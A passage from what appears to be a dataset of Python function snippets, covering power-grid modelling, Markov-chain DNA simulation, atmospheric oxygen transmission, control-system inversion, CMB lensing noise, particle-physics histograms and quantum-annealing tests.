0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [10, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [11, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [12, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [13, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [14, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [15, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [16, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0]\r\n ])\r\n\r\n ## generator data\r\n # bus, Pg, Qg, Qmax, Qmin, Vg, mBase, status, Pmax, Pmin, Pc1, Pc2,\r\n # Qc1min, Qc1max, Qc2min, Qc2max, ramp_agc, ramp_10, ramp_30, ramp_q, apf\r\n ppc[\"gen\"] = array([\r\n [1,\t0,\t0,\t10,\t-10,\t1.0224,\t100,\t1,\t10,\t-10,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0, 0, 0,0, 0, 0],\r\n [3 ,0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [5 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [10 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [13 ,0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [15 , 0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0]\r\n ])\r\n load_b = array([2, 4, 9, 12, 14])\r\n ppc[\"bus\"][load_b, 2] = multiply(array([-2.1125, -0.2231, -0.1664, -0.0719, -1.4633]).T, 0.03)\r\n ppc[\"bus\"][load_b, 3] = multiply(array([1.6492, 0.4054, 0.8599, 0.8845, 0.6778]).T, 0.03)\r\n ## branch data\r\n # fbus, tbus, r, x, b, rateA, rateB, rateC, ratio, angle, status, angmin, angmax\r\n ppc[\"branch\"] = array([\r\n [1, 2, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 8, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 15, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 3, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 6, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 7, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [3, 4, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [4, 5, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 9, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 12, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 13, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 10, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 14, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [10, 11, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [15, 16, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0]\r\n ])\r\n R1 = 0.43\r\n L1 = 0.4e-3\r\n RS1 = 0.32\r\n LS1 = 0.39e-3\r\n Zbase = (0.4*0.4/100)\r\n branch_phase =array([\r\n [1, 1, 2, 188, R1, L1],\r\n [2, 1 ,8, 346, R1, L1],\r\n [3 ,1 ,15,501, R1 ,L1],\r\n [4, 2, 3, 130, RS1,LS1],\r\n [5, 2, 6, 145, RS1,LS1],\r\n [6, 2 ,7, 157, RS1,LS1],\r\n [7, 3, 4, 185, RS1,LS1],\r\n [8, 4, 5, 1000,RS1,LS1],\r\n [9, 8 ,9, 416, RS1,LS1],\r\n [10,8 ,12,130, RS1,LS1],\r\n [11,8 ,13,121, RS1,LS1],\r\n [12,9 ,10,130, RS1,LS1],\r\n [13,9 ,14,127, RS1,LS1],\r\n [14,10,11,251, RS1,LS1],\r\n [15,15,16,345, RS1,LS1]\r\n ])\r\n ppc[\"branch\"][:, [2,3]] = multiply(array([branch_phase[:, 4]*branch_phase[:, 3], branch_phase[:, 4]*branch_phase[:, 4]*100*pi]).T,0.001/Zbase)\r\n\r\n ##----- OPF Data -----##\r\n ## area data\r\n # area refbus\r\n\r\n\r\n ## generator cost data\r\n # 1 startup shutdown n x1 y1 ... xn yn\r\n # 2 startup shutdown n c(n-1) ... c0\r\n\r\n\r\n return ppc", "def marcovNuc (i = random.choice(stateSpace), step = 100):\n # matrix of transition probabilities\n #matrix = [[0.25, 0.25, 0.25, 0.25], [0.25, 0.25, 0.25, 0.25], [0.25, 0.25, 0.25, 0.25], [0.25, 0.25, 0.25, 0.25]] \n matrix = [[0.4, 0.3, 0.2, 0.1], [0.4, 0.3, 0.2, 0.1], [0.4, 0.3, 0.2, 0.1], [0.4, 0.3, 0.2, 0.1]] \n step += 1 # add one to the range because we remove it at the end\n sims = [] # List to hold the results of the Marcov chain\n sims.append(i) # append the seed value to the sims list\n for x in range(step):\n \n if sims[-1] == 'A':\n w = np.random.random() # Random number generator\n # the next set of if statements determine where the random number \n # sits on the number line of probabilities\n if matrix[0][0] > w:\n sims.append('A')\n elif matrix[0][1] + matrix[0][0] > w:\n sims.append('C')\n elif matrix[0][2] + matrix[0][1] + matrix[0][0] > w:\n sims.append('G')\n else:\n sims.append('T')\n elif sims[-1] == 'C':\n x = np.random.random()\n if matrix[1][0] > x:\n sims.append('A')\n elif matrix[1][1] + matrix[1][0] > x:\n sims.append('C')\n elif matrix[1][2] + matrix[1][1] + matrix[1][0] > x:\n sims.append('G')\n else:\n sims.append('T')\n \n elif sims[-1] == 'G':\n y = np.random.random()\n if matrix[2][0] > y:\n sims.append('A')\n elif matrix[2][1] + matrix[2][0] > y:\n sims.append('C')\n elif matrix[2][2] + matrix[2][1] + matrix[2][0] > y:\n sims.append('G')\n else:\n sims.append('T')\n\n else:\n z = np.random.random()\n if matrix[3][0] > z:\n sims.append('A')\n elif matrix[3][1] + matrix[3][0] > z:\n sims.append('C')\n elif matrix[3][2] + matrix[3][1] + matrix[3][0] > z:\n sims.append('G')\n else:\n sims.append('T')\n\n return sims[1:-1] # remove the initial value (the seed)", "def V2E(V):\n# for v in m/s returns energy in meV\n return 5.227e-6*V*V", "def OxygenTransmission(T,P,n_wv,wavelength,dr,freq_lim=np.array([lp.c/770e-9,lp.c/768e-9]),sim_nu=np.array([]),spec_file=''):\n # fraction of O2 by number density\n fO2 = (32*0.2320+28.02*0.7547+44.01*0.00046+39.94*0.0128+20.18*0.000012+4.0*0.0000007+83.8*0.000003+131.29*0.00004)*0.2320/32.0\n \n if len(spec_file) == 0:\n spec_file = '/Users/mhayman/Documents/DIAL/O2_HITRAN2012_760_781.txt'\n \n if sim_nu.size==0:\n sim_nu = np.arange(-3e9,3e9,20e6)\n \n# inu0 = np.argmin(np.abs(sim_nu)) # index to center of frequency array\n \n n_o2=fO2*(P/(lp.kB*T)-n_wv) # to convert atm to Pa use *101325\n ext_o2 = rb.ExtinctionFromHITRAN(lp.c/wavelength+sim_nu,T,P,(mO2*1e-3)/lp.N_A,nuLim=freq_lim,freqnorm=True,filename=spec_file).T\n T_o2 = np.exp(-np.cumsum(n_o2[np.newaxis,:]*ext_o2,axis=1)*dr)\n \n return T_o2,sim_nu", "def intf_MIDN(E):\n inputok= False\n if E.The.StackSize() >= 3: # Ensure something is here.\n checkob= E.The.StackCopyItemLast() \n if checkob.whatami == \"VAL\":\n inputok= True\n if not inputok or not inc.point_formatted_LST(E.The,2) or not inc.point_formatted_LST(E.The,3):\n print(\"Input Error: midn\")\n print(intf_MIDN.__doc__)\n return # Without doing much of anything.\n ratio= E.The.StackPop().val\n P1object= E.The.StackPop()\n #P1= map(lambda x:x.val, P1object.val) # Should now be a list of floats.\n P1= [x.val for x in P1object.val] # Should now be a list of floats.\n P0object= E.The.StackPop()\n #P0= map(lambda x:x.val, P0object.val) # Should now be a list of floats.\n P0= [x.val for x in P0object.val] # Should now be a list of floats.\n x= (P1[0]-P0[0]) * ratio + P0[0]\n y= (P1[1]-P0[1]) * ratio + P0[1]\n z= (P1[2]-P0[2]) * ratio + P0[2]\n z= objectifier.StackOB_VAL(z) # Can't be just regular Python ints.\n y= objectifier.StackOB_VAL(y)\n x= objectifier.StackOB_VAL(x)\n p= objectifier.StackOB_LST([x, y, z])\n p.names= ['x','y','z']\n E.The.StackPush(p)", "def p(e, t):\n return b * e ** 2", "def stbinv(A, B, C, D, y, t):\n # Description to help the user\n\n # calculate the number of samples of the output\n N = np.shape(y)[\n 1\n ] # the number of samples is the number of columns of the data matrix y\n\n # calculate system's dimensions: number of states and number of inputs\n m = B.shape[1] # number of inputs\n n = A.shape[0] # number of states\n\n # initialize the variable v (additional input)\n v = np.zeros((n, N)) # it will be important later\n\n # initializing the flag variable\n flag = 0\n # initializing the flag variable for the vrft method\n flag_vr = 0\n # initializing the counter of reduction steps done by the algorithm\n kround = 0\n\n # starting the loop of the reduction procedure\n while flag == 0:\n # run a step of the reduction order algorithm\n Ahat, Bhat, Chat, Dhat, yhat, vhat, nhat, phat, rhat = invredc(A, B, C, D, y, v)\n # increase the counter of reductions\n kround = kround + 1\n\n # preallocating the state vector of the inverse system\n xhat = np.zeros((nhat, N - kround)) # it must have N-kround samples\n # preallocating the calculated input\n uhat = np.zeros((m, N - kround))\n\n # defining the reduced time vector\n tt = t[:, 0 : N - kround]\n\n # test the conditions of invertibility\n if phat < m:\n # if this condition is true, then the algorithm has failed and it is not possible to find the inverse\n flag = 1\n flag_vr = 1\n # if this is the case, we print a message and end the execution\n # print('The inversion algorithm has failed')\n return uhat, tt, flag_vr\n else:\n if rhat == m:\n # ((rhat==m)&(rhat==phat)):\n # if this condition is true, then the algorithm is done. We can calculate the signal u\n flag = 2\n # calculating the inverse of the feedforward matrix\n # E=np.linalg.inv(Dhat)\n E = np.linalg.pinv(Dhat)\n else:\n # if none of the conditions above is true, then we need to proceed to another round of the reduction step of the algorithm\n A = Ahat\n B = Bhat\n C = Chat\n D = Dhat\n y = yhat\n v = vhat\n # after the reduction procedure is done, then the system can be inverted\n\n # calculating the dynamic matrix of the inverse system\n Ainv = Ahat - Bhat @ E @ Chat\n # eigenvalues of the inverse system's dynamic matrix\n wv, v = np.linalg.eig(Ainv) # w=eigenvalues, v=eigenvectors\n # calculating the input matrix of the inverse system\n Binv = Bhat @ E\n # calculating the output matrix of the inverse system\n Cinv = -E @ Chat\n # calculating the feedforward matrix of the inverse system\n Dinv = E\n\n # test if the inverse dynamic system is stable\n wbool = wv > 1\n wsum = np.sum(wbool)\n # test if wsum is greater than 1\n if wsum > 0:\n # if wsum is greater than 1, then, the inverse system is unstable, so we end the execution of the algorithm\n # print('The inverse system is unstable')\n flag_vr = 2\n return uhat, tt, flag_vr\n else:\n # if wsum=0, then the inverse system is stable, and we can calculate the input signal\n # calculate the first value for the output (t=0)\n uhat[:, 0] = Cinv @ xhat[:, 0] + Dinv @ yhat[:, 0]\n # calculate the states and the output of the inverse system\n for k in range(0, N - 1 - kround):\n xhat[:, k + 1] = Ainv @ xhat[:, k] + Binv @ yhat[:, k] + vhat[:, k]\n uhat[:, k + 1] = Cinv @ xhat[:, k + 1] + Dinv @ yhat[:, k + 1]\n\n return uhat, tt, flag_vr", "def N_TB_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalBB(l2)\n result += 0. #self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalEB(l2)\n result *= self.F_TB(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TB_EB.__func__, \"integ\"):\n self.N_TB_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TB_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TB_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def produce_13TeV_template(tag_name=\"HKHI\"):\n num_rebin = 1\n file_name = \"inputs/BkgEstimation_Lin/BkgEstimation_NONE_TOPO_PTDEP_\"+tag_name+\"_Lin.root\"\n print \"Input: \", file_name\n fin = ROOT.TFile.Open(file_name, \"read\")\n h_nom = fin.Get(\"bkg_total_gg_full\").Clone(\"bkg_nominal_old\")\n h_nom.Rebin(num_rebin)\n fout = ROOT.TFile.Open(\"hists_input_\"+tag_name+\".root\", \"recreate\")\n\n h_purity_sys = fin.Get(\"bkg_purity_syst_gg_full\").Clone(\"bkg_purity_syst_gg\")\n h_reducible_sys = fin.Get(\"bkg_reducible_syst_gg_full\").Clone(\"bkg_reducible_syst_gg\")\n h_irreducible_sys = fin.Get(\"bkg_irreducible_syst_gg_full\").Clone(\"bkg_irreducible_syst_gg\")\n h_iso_sys = fin.Get(\"bkg_iso_syst_gg_full\").Clone(\"bkg_iso_syst_gg\")\n\n #file_iso = \"isolation_sys/hist.root\"\n #fin2 = ROOT.TFile.Open(file_iso, \"read\")\n #h_iso_sys = fin2.Get(\"bkg_isolation_syst_gg\")\n ## inflat irreducible uncertainty by factor of 10\n # so that it closes to stats uncertainty in data\n sf = 1\n if INFLATE_SYS:\n sf = 10\n\n # after rebinning systematic uncertainties, need to scale down,\n # otherwise the uncertainties are inflated.\n h_purity_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_irreducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_reducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_iso_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n\n ## truncate the histograms to [200, 2000] GeV\n h_nom_new = truncate_hist(h_nom, \"bkg_nominal\")\n h_purity_sys_new = truncate_hist(h_purity_sys, \"h_purity_sys_new\")\n h_irreducible_sys_new = truncate_hist(h_irreducible_sys, \"h_irreducible_sys_new\")\n h_reducible_sys_new = truncate_hist(h_reducible_sys, \"h_reducible_sys_new\")\n h_iso_sys_new = truncate_hist(h_iso_sys, \"h_iso_sys_new\")\n\n #write down sys and nominal\n fout.cd()\n h_nom_new.Write()\n h_purity_sys_new.Write()\n h_reducible_sys_new.Write()\n h_irreducible_sys_new.Write()\n h_iso_sys_new.Write()\n\n h_purity_up, h_purity_down = create_sys_hist(h_nom_new, h_purity_sys_new, \"purity_sys\")\n h_purity_up.Write()\n h_purity_down.Write()\n\n h_red_up, h_red_down = create_sys_hist(h_nom_new, h_reducible_sys_new, \"reducible_sys\")\n h_red_up.Write()\n h_red_down.Write()\n\n h_irred_up, h_irred_down = create_sys_hist(h_nom_new, h_irreducible_sys_new, \"irreducible_sys\")\n h_irred_up.Write()\n h_irred_down.Write()\n\n h_iso_up, h_iso_down = create_sys_hist(h_nom_new, h_iso_sys, \"isolation_sys\")\n h_iso_up.Write()\n h_iso_down.Write()\n\n fin.Close()\n fout.Close()", "def solveForModeB1(X, M, n, maxInner, epsilon, tol,sita,Y1, lambta2):\n # Pi(n) = [A(N) kr A(N-1) kr ... A(n+1) kr A(n-1) kr .. A(1)]^T\n Pi = tensorTools.calculatePi(X, M, n)\n #print 'Pi size', Pi.shape\n #print 'pi='+str(Pi)\n #print(M.U[n])\n for iter in range(maxInner):\n # Phi = (X(n) elem-div (B Pi)) Pi^T\n #print X.vals.shape,X.shape\n #print X.vals.flatten().shape\n Phi = tensorTools.calculatePhi(X, M.U[n], Pi, n, epsilon=epsilon)\n #print('phi'+str(Phi))\n #print(Phi)\n # check for convergence that min(B(n), E - Phi(n)) = 0 [or close]\n kktModeViolation = np.max(np.abs(np.minimum(M.U[n], 1-Phi).flatten()))\n if (kktModeViolation < tol):\n break\n\n B=M.U[n]\n #print B.shape\n colNorm = np.apply_along_axis(np.linalg.norm, 0, B, 1)\n zeroNorm = np.where(colNorm == 0)[0]\n colNorm[zeroNorm] = 1\n B = B / colNorm[np.newaxis, :]\n tm=np.hstack((np.ones((B.shape[0],1)),B))\n Y1=Y1.reshape((Y1.shape[0],1))\n\n derive=-1.0*lambta2/B.shape[0]*np.dot((Y1-np.dot(tm,sita)),sita.T)\n #print derive.shape\n #print np.multiply(M.U[n],derive[:,1:]).shape\n #print np.multiply(M.U[n],Phi).shape\n M.U[n] = np.array(np.multiply(M.U[n],Phi))-np.array((np.multiply(M.U[n],derive[:,1:])))\n\n #print 'after'\n #print M.U[n][0]\n #print(\" Mode={0}, Inner Iter={1}, KKT violation={2}\".format(n, iter, kktModeViolation))\n return M, Phi, iter, kktModeViolation", "def sum_simulated_test():\n f = open(\"./results/simulated_sigmoid_sum.csv\", \"w\")\n #f1 = open(\"./results/avg_pres.txt\", \"w\")\n #f.write(\"num. of qubits; precision\\n\")\n\n\n computable_qubits = 27\n num_subtest = 1000\n\n acum_precision = 0\n coeffs = []\n temp = -10\n while temp < 11:\n coeffs.append(temp)\n temp += 0.25\n #for coeff in coeffs:\n # variables.c_summation = coeff\n # print(coeff)\n for i in range(2, computable_qubits):\n #print(\"qubit: \", i)\n precision = 0\n x = []\n for j in range(num_subtest):\n\n random_dict = get_random_dict(i)\n\n # compute real answer\n real_answer = 0\n for value in random_dict.values():\n real_answer += value\n # f1.write(str(real_answer)+\";\")\n x.append(real_answer)\n\n # assign spin value to real_answer\n if real_answer < 0:\n real_answer = -1\n elif real_answer > 0:\n real_answer = 1\n else:\n real_answer = 0\n bqm = get_bqm()\n quantum_sigmoid_sum(bqm, random_dict, \"target\")\n sampler = get_simulated_sampler()\n result = sampler.sample(bqm)\n if real_answer == 0:\n precision += 1\n # f1.write(\"1\\n\")\n elif real_answer == result.first.sample['target']:\n precision += 1\n # f1.write(\"1\\n\")\n# else:\n # f1.write(\"0\\n\")\n\n precision /= num_subtest\n # acum_precision+= precision\n\n f.write(str(i) + \";\" + str(precision) + \"\\n\")\n f.close()\n #f1.write(str(coeff)+\";\"+ str(round(acum_precision/(computable_qubits-1), 4)) + \"\\n\")\n # acum_precision = 0\n #f1.close()", "def evaltr(x_solution): \n \n large = 10.0**30\n pred = np.zeros(cfg.ntrain)\n e0 = 0.0 # mean of observed values\n y=0.0\n for i in range(cfg.ntrain): # Computation of correct piece\n e0 += cfg.a_unscaled[i][-1]\n pind = 0\n ipbest = 0\n pbest = -large # for max\n \n for j1 in range(cfg.nomax):\n ipmin=pind\n pmin=large # for min\n for _ in range(cfg.jk[j1]):\n piece=x_solution[(pind+1)*cfg.nfea-1] \n for j3 in range(cfg.nfea-1): #\n piece += x_solution[pind*cfg.nfea+j3]*cfg.a_unscaled[i][j3]\n if piece < pmin:\n ipmin = pind\n pmin = piece\n pind += 1 \n \n if pmin > pbest:\n ipbest = ipmin\n pbest = pmin\n \n pred[i] = x_solution[(ipbest+1)*cfg.nfea-1] # Computation of prediction\n for j1 in range(cfg.nfea-1):\n pred[i] += x_solution[ipbest*cfg.nfea+j1]*cfg.a_unscaled[i][j1]\n y += pred[i]\n \n y = y/cfg.ntrain \n e0 = e0/cfg.ntrain\n \n # Computation of indices\n rmse = 0.0\n mae = 0.0\n e1 = 0.0\n for i in range(cfg.ntrain):\n rmse += (pred[i]-cfg.a_unscaled[i][-1])**2\n mae += np.abs(pred[i]-cfg.a_unscaled[i][-1]) \n e1 += (cfg.a_unscaled[i][-1] - e0)**2\n ce = 1.0 - rmse/e1 \n rmse = np.sqrt(rmse/cfg.ntrain)\n mae = mae/cfg.ntrain \n\n if cfg.ntrain > 1:\n sx=0.0\n sy=0.0\n rcor=0.0\n for i in range(cfg.ntrain):\n sx += (pred[i]-y)**2\n sy += (cfg.a_unscaled[i][-1]-e0)**2 \n rcor += (pred[i]-y) * (cfg.a_unscaled[i][-1]-e0) \n\n r = rcor/np.sqrt(sx*sy)\n \n return rmse,mae,ce,r", "def test_create_tpm(self):\n command_line = self._MENU + [self._POOLNAME] + self._DEVICES + [\"--clevis=tpm2\"]\n TEST_RUNNER(command_line)", "def set_T_lm(self):\n self.delta_T_lm_array = ( ((self.exh.T_outlet_array -\n self.cool.T_inlet_array) - (self.exh.T_inlet_array -\n self.cool.T_outlet_array)) / np.log((self.exh.T_outlet_array -\n self.cool.T_inlet_array) / (self.exh.T_inlet_array -\n self.cool.T_outlet_array)) )", "def fig16():\n # fmt: off\n tpm = np.array([\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [1, 0, 0, 0, 0, 0, 0],\n [1, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [1, 0, 0, 0, 0, 1, 1],\n [1, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n ])\n cm = np.array([\n [0, 1, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 1, 0, 0, 0, 0, 0],\n [0, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 0, 0, 0, 1, 1],\n ])\n # fmt: on\n return Network(tpm, cm=cm, node_labels=LABELS[:tpm.shape[1]])", "def ec_matrix_vector(p0, T, n): \n if(n<=0):\n EC=np.zeros(T.shape)\n return EC\n else:\n \"\"\"Probability vector after (k=0) propagations\"\"\" \n p_k=1.0*p0\n \"\"\"Sum of vectors after (k=0) propagations\"\"\"\n p_sum=1.0*p_k \n for k in xrange(n-1):\n \"\"\"Propagate one step p_{k} -> p_{k+1}\"\"\"\n p_k=np.dot(p_k,T) \n \"\"\"Update sum\"\"\"\n p_sum+=p_k \n \"\"\"Expected counts\"\"\"\n EC=p_sum[:,np.newaxis]*T \n return EC", "def simulate_func(function, t): \n out = function.PLsig(t)\n \n return out, True", "def solve_LF(self):\n self.u = zeros(self.N)\n self.u[0] = self.u0\n self.u[1] = self.u1\n u = self.u\n f= self.f\n dt = self.dt\n t = self.t\n N = self.N\n for n in xrange(1,N-1):\n u[n+1] = 2*dt*f(u[n],t[n]) + u[n-1]\n #return t,u", "def test_generate_nb(self):\n pass", "def Create(self, tokens):\n self.delay1 = int(tokens[DELAY1])\n self.delay2 = int(tokens[DELAY2])\n self.block = int(tokens[BLOCK])\n self.trial = 